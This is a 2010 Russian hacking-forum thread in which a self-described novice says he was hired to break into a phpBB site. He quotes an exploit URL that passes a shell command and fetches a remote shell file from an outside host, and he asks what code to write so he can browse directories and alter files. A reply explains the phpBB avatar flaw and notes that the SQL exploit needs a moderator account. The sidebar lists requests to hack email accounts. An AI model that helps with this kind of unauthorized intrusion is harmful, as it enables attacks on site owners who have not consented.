Нажмите CTRL-D чтобы добавить нас в закладки
HackZone.RU - Выполнение SQL команд
Войти / Регистрация / Участники
Определение даты выпуска iPhone по серийному номеру
-
Поиск по сайту
Форумы



Реклама

Взлом и безопасность / WEB сайтов RSS подписка на сообщения с форума Subscribe
Технологии взлома сайтов - xss, sql injection. Для сообщений "взломайте мне сайт" есть форум "Предложения работы".

Новая тема Наиболее обсуждаемые темы Наиболее посещаемые темы
Поиск 
Период
Перейти

Просмотров - 3806
Выполнение SQL команд
Добавить этот топик в закладки »
RSS-лента ответов »Subscribe
B3JIoMep




Platinum Member
# | Сообщение добавлено 04.09.2010 12:03:53
Отредактировано 04.09.2010 13:55:30 by B3JIoMep
Вобщем мне заказали один сайт на бесплатный взлом. Я посмотрел...(точнее там даже смотреть то ниче не надо было:) ) Сайт был на phpBB. Я пошел на багтрак, где увидел следующее: Обход ограничений безопасности в phpBB (эксплоит, exploit)  . Из эксплоита я выдрал вот что:
http://some_vulnerable.host/somescript.php?cmd=ls%20-la&xpl=http://somehost/someshell.txt
Т.е. возможно чтение файла с другого хоста. Я с таким еще не сталкивался, так что подскажите плиз что мне вписать в этот someshell.txt что бы вывйти в определенную папку(шастанье по дерикториям), а в последствии изменить определенный файл. И как это реализовать? Я новичек, по этому строго не судите))) Может немного не правильно называю некоторые вещи...
 
гений, миллиардер, плейбой, филантроп)0)
Сказать спасибо Ответить Цитировать

_ruzmaz_


Gold Member
# | Сообщение добавлено 04.09.2010 13:25:42
Отредактировано 04.09.2010 13:27:56 by _ruzmaz_
если ты про phpBB 2.0.20 multiple issues with avatars
http://grokbase.com/topic/2006/05/12/phpbb-2-0-20-persistent-issues-with-avatars/jnTNvTuZioYvDZEqqXx5AWXY-xk
то там имеется в виду, что можно отправлять get запросы (но без получения ответа) на другие сервера через сервер, на котором стоит уязвимая cms, с помощью задания нужного урла своего аватара (пример такого урла, взятый из описания уязвимости, у тебя в посте записан)
Сказать спасибо Ответить Цитировать

B3JIoMep




Platinum Member
# | Сообщение добавлено 04.09.2010 13:50:40
Отредактировано 04.09.2010 14:00:23 by B3JIoMep
Ок. Спс за ответ.
Поняв что ту уязвимость мне походу не реализовать я снова пошел на багтрак и нашел там сплоит под выполнение скуль запросов. С помощью каких запросов можно сделать тоже самое, что я хотел сделать в прошлом посте?
http://www.xakep.ru/post/32806/default.asp   -   эксплоит брал от сюда.
 
гений, миллиардер, плейбой, филантроп)0)
Сказать спасибо Ответить Цитировать

_ruzmaz_


Gold Member
# | Сообщение добавлено 04.09.2010 14:14:24
Отредактировано 04.09.2010 14:15:12 by _ruzmaz_
you need a global moderator account with "simple moderator" role
есть такой акк у тебя)?
Сказать спасибо Ответить Цитировать

B3JIoMep




Platinum Member
# | Сообщение добавлено 04.09.2010 14:21:28
Ой)) Эт я упустил)) Был бы такой акк, я б ух ...! Значит ковыряю дальше))
 
гений, миллиардер, плейбой, филантроп)0)
Сказать спасибо Ответить Цитировать


Только зарегистрированные пользователи могут оставлять сообщения в форуме

Зарегистрироваться *** Авторизоваться

 Последние новости и статьи  Последние сообщения с форумов
  • WhatsApp уверяет пользователей, что Facebook не имеет доступа к и...
  • Однострочная команда в Windows 10 может повредить жесткий диск с ...
  • Кардерский форум Joker’s Stash объявил о закрытии
  • Релиз ядра Linux 5.9
  • Российские хакеры вооружились уязвимостью Zerologon
  • Тысячи приватных звонков американских заключенных оказались в отк...
  • Шифровальщик атаковал немецкую компанию Software AG
  • Злоумышленники используют службу Windows Error Reporting для бесф...
  • Microsoft предупредила о вымогателях, которые выдают себя за МВД ...
  • Инфостилер Valak ворует информацию из почтовых систем Microsoft E...

    Все новости... Все статьи... Прислать новость RSS
  • Взлом и безопасность / Разное » Re: Помощь в скачивании платного файла
  • Взлом и безопасность / Разное » Помощь в скачивании платного файла
  • Разное / Куплю, приму в дар » куплю | ваш аккаунта | получение нового | описание внутри
  • Разное / Предложения работы » Специалиста
  • Downloads / Другое » Re: Нужна база емайл адресов юр. лиц
  • Downloads / Другое » Нужна база емайл адресов юр. лиц
  • Разное / Предложения работы » Нужен взлом mail и gmail почты
  • Взлом и безопасность / Разное » Re: Нужна помощь в скачивании файла
  • Взлом и безопасность / Разное » Нужна помощь в скачивании файла
  • Разное / Предложения работы » требуется взлом почт на постоянной основе

    Все форумы... RSS


  • Разместить рекламу
    © HackZone Ltd. 1996-2020. Все права зарегистрированы.
    Перепечатка материалов без согласования и указания источника будет преследоваться по Закону

    О проекте | История проекта | Размещение рекламы | Обратная связь | Правила поведения на портале
    contador de visitas счетчик посещений

    #{title}

    #{text}

    x

    #{title}

    #{text}